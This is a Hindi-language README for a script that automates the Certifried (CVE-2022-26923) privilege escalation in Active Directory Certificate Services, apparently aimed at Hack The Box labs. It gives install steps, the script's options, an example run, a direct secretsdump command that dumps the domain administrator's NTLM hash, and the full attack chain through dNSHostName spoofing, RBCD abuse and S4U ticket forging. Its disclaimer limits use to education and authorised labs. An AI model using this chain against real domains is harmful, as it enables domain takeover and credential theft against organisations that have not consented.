
CVE-2022-26923 का शोषण
CVE-2022-26923 (Certifried) के शोषण का स्वचालन, जो Active Directory Certificate Services (AD CS) और Resource-Based Constrained Delegation (RBCD) के दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि की अनुमति देता है, जिसके परिणामस्वरूप डोमेन व्यवस्थापक खाते के NTLM हैश को डंप किया जाता है।
⚠️ केवल शैक्षिक उपयोग / लैब / HTB
अधिकृत वातावरण के बाहर उपयोग न करें।
यह स्क्रिप्ट निम्नलिखित आक्रमण श्रृंखला को स्वचालित करती है:
dNSHostName को संशोधित करनाadministrator के लिए Kerberos टिकट प्राप्त करनाsecretsdump.py के माध्यम से NTLM डंपcertipy-adbloodyADgetST.py (Impacket)secretsdump.py (Impacket)opensslpipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]
-d, --dc-ip Domain Controller का IP
-D, --domain डोमेन का नाम
-u, --user वैध उपयोगकर्ता
-p, --pass उपयोगकर्ता पासवर्ड
-c, --comp-name नियंत्रित मशीन का नाम
-C, --comp-pass मशीन पासवर्ड
-a, --ca-name Certificate Authority का नाम
-t, --template प्रमाणपत्र टेम्पलेट
-f, --pfx-file PFX फ़ाइल का नाम
-H, --dc-hostname DC का होस्टनाम
-A, --dc-account DC खाता
-i, --impersonate नकल करने का लक्ष्य खाता
--verbose डीबग मोड
-h, --help सहायता
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose
निष्पादन के अंत में:
administrator.ccacheadministrator खाते का NTLM डंपKerberos समस्या की स्थिति में:
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39
Machine Account Creation
↓
dNSHostName spoofing
↓
Certificate Request (Machine Template)
↓
Authentication via PFX
↓
RBCD abuse (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
Kerberos Ticket extraction
↓
NTLM dump via secretsdump
यह परियोजना निम्नलिखित उद्देश्यों के लिए प्रदान की गई है:
लेखक अनधिकृत उपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
MIT